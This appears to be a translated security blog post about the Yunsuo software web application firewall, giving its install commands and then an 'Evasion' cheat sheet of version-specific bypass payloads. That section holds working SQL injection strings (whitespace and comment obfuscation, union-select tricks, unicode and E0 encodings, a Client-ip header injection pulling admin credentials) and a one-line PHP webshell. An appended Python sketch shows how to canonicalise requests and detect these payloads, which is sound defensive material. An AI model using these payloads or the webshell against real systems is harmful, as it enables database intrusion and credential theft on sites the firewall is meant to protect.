  • Application Security - Security Appliances - WAF Series - Software WAF - Yunsuo (云锁)


    Installation

    Installation - Linux

    Prerequisite:
    Check the SELinux status and disable SELinux
        getenforce    # "disabled" means SELinux is off
    1. Download
        x86: wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/install
        x64: wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install
    2. Extract
        chmod +x yunsuo_install/install
    3. Run the installer from the current directory
        yunsuo_install/install
    4. Add the server to the cloud center.
        /usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd
        Note: cloud_name is the cloud center account name; cloud_passwd is the cloud center login password
    5. Check the status
        ps -ef | grep yunsuo_agent

    Related commands
    Start/stop/restart/status of Yunsuo
        service yunsuo start/stop/restart/status
        /etc/init.d/yunsuo start/stop/restart/status
    Uninstall
        /usr/local/yunsuo_agent/uninstall

    Installation - Windows

    Download
    http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe

    Evasion

    GET/POST conversion + whitespace substitution
    For cases where filtering is incomplete

    Search box + SQL injection + string type
    ?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23

    union select + () bypass

    ?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)

    union select + '' + /**/ + ) + # bypass

    ?id='/*')union select user,database() from users%23*/&submit=Submit#

    IIS + character-encoding bypass - unicode

    asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0

    WideChar and MultiByte character conversion issue - 2002

    One-line webshell + China Chopper (菜刀) bypass

    <?php
    $_REQUEST['a']($_REQUEST['b']);
    ?>

    Version 1.3.145 - packet redundancy (padding) bypass

    The portion beyond 7250 bytes is not inspected

    Version 1.3.145 - x00 bypass

    GET type
    def getdata(n):
        data = 'name=x00test'
        data += '&id=select 1 from table'
        return data
    
    POST type
    def postdata(n):
        data = '------WebKitFormBoundarycMYRelX1B2H69xy9\n'
        data += '------WebKitFormBoundarycMYRelX1B2H69xy9\n'
        data += '%27abcd\n'
        data += '------WebKitFormBoundarycMYRelX1B2H69xy9\n'
        data += 'Content-Disposition: form-data; name="submit"\n\n'
        data += 'select 1 from table\n'
        data += '------WebKitFormBoundarycMYRelX1B2H69xy9\n'
        return data
    
    COOKIE type
    header = {
        'User-Agent' : 'letmetest',
        'Content-Type' : 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9',
        'X-forwarded-For' : 'select 1 from table'
    }

    Version 1.3.145 - E0 bypass
    ?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
    
    ?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#

    Version 1.3.191 - E0 + /**/ + current_user bypass

    ?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
    ?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

    Version 1.4.121 - POST and cookies are not inspected by default, and header fields are not protected

    Header - Client-ip injection
    Client-ip: 1.2.3.4     'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),
    (SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tables
    GROUP by a)b) or @ `'` and ''='
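
Defensive view of the payloads above, as an added example that is not part of the original post: each one works because the filter matches a different string than the one the database parses, so this sketch canonicalises every parameter, every header and the full body before matching. The names RULES, views, scan and inspect_request and the three signatures are assumptions made for illustration; the %u-encoding case is not covered.

```python
import re
from urllib.parse import unquote_plus

# Illustrative signatures, not a complete rule set. "union" has no leading \b:
# in "8E0union" and "-1union" there is no word boundary in front of it.
RULES = {
    "union-select": re.compile(r"union[\s(]*(?:all|distinct)?[\s(]*select", re.I),
    "select-from": re.compile(r"select\b.{0,200}?\bfrom\b", re.I | re.S),
    "schema-probe": re.compile(r"information_schema", re.I),
}
COMMENT = re.compile(r"/\*.*?\*/", re.S)


def views(value):
    """Return the two canonical forms every rule is matched against."""
    decoded = value
    for _ in range(3):  # undo nested percent-encoding
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # \s covers \n \t \x0b \x0c \r, the separators used in the first payload.
    flat = re.sub(r"\s+", " ", decoded)
    # Comment-stripped view. The flat view is kept as well because /* inside a
    # quoted string is data to the database, so stripping would hide what follows.
    stripped = re.sub(r"\s+", " ", COMMENT.sub(" ", decoded))
    return flat, stripped


def scan(value):
    """Sorted names of the rules that fire on either view of value."""
    return sorted({name for view in views(value)
                   for name, rx in RULES.items() if rx.search(view)})


def inspect_request(params, headers, body=""):
    """Scan every parameter, every header and the whole body, with no size cut-off."""
    fields = [("param:" + k, v) for k, v in params.items()]
    fields += [("header:" + k, v) for k, v in headers.items()]
    fields.append(("body", body))
    return {loc: hits for loc, v in fields if (hits := scan(v))}


# Constructed sample request, shortened from the payloads quoted on this page.
SAMPLE = inspect_request(
    {"id": "8E0union/*123*/select/*123*/1,2,3,current_user", "page": "2"},
    {"Client-ip": "1.2.3.4 'or (SELECT 1 FROM information_schema.tables)"},
    "name=" + "A" * 8000 + "&id=select 1 from table",
)
```

The quoted-comment payload is only caught on the flat view and the /*123*/ payload only on the comment-stripped view, which is why both are matched.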
     
  • Original article: https://www.cnblogs.com/AtesetEnginner/p/11358064.html